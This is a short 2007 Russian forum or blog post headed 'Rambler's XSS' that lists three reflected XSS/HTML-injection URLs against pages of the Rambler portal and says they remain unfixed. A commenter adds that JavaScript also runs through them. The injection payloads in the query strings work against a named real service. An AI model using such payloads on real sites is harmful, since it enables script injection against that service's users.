22 Мая, 2007

Rambler's XSS

Алексей Томилов
Давно это было, но до сих пор не закрыто.

1.
_http://ftpsearch.rambler.ru/db/ftpsearch/search.html?ftype=5&form=2&site=rumesto.ru&dir=<h1>rumesto.ru

2.
_http://www.rambler.ru/db/support/feedback.shtml
xss при отправке.

3.
_http://ftpsearch.rambler.ru/db/ftpsearch/search.html?ftype="><h1>&form=0&t=e&words=rumesto.ru
или введите имя

CAPTCHA
22 Мая, 2007
RE: Rambler's XSS
гы прикольна, и вместа хтмльного х1 и ява скриптег тоже пахает, тока вот пользы ....
0 |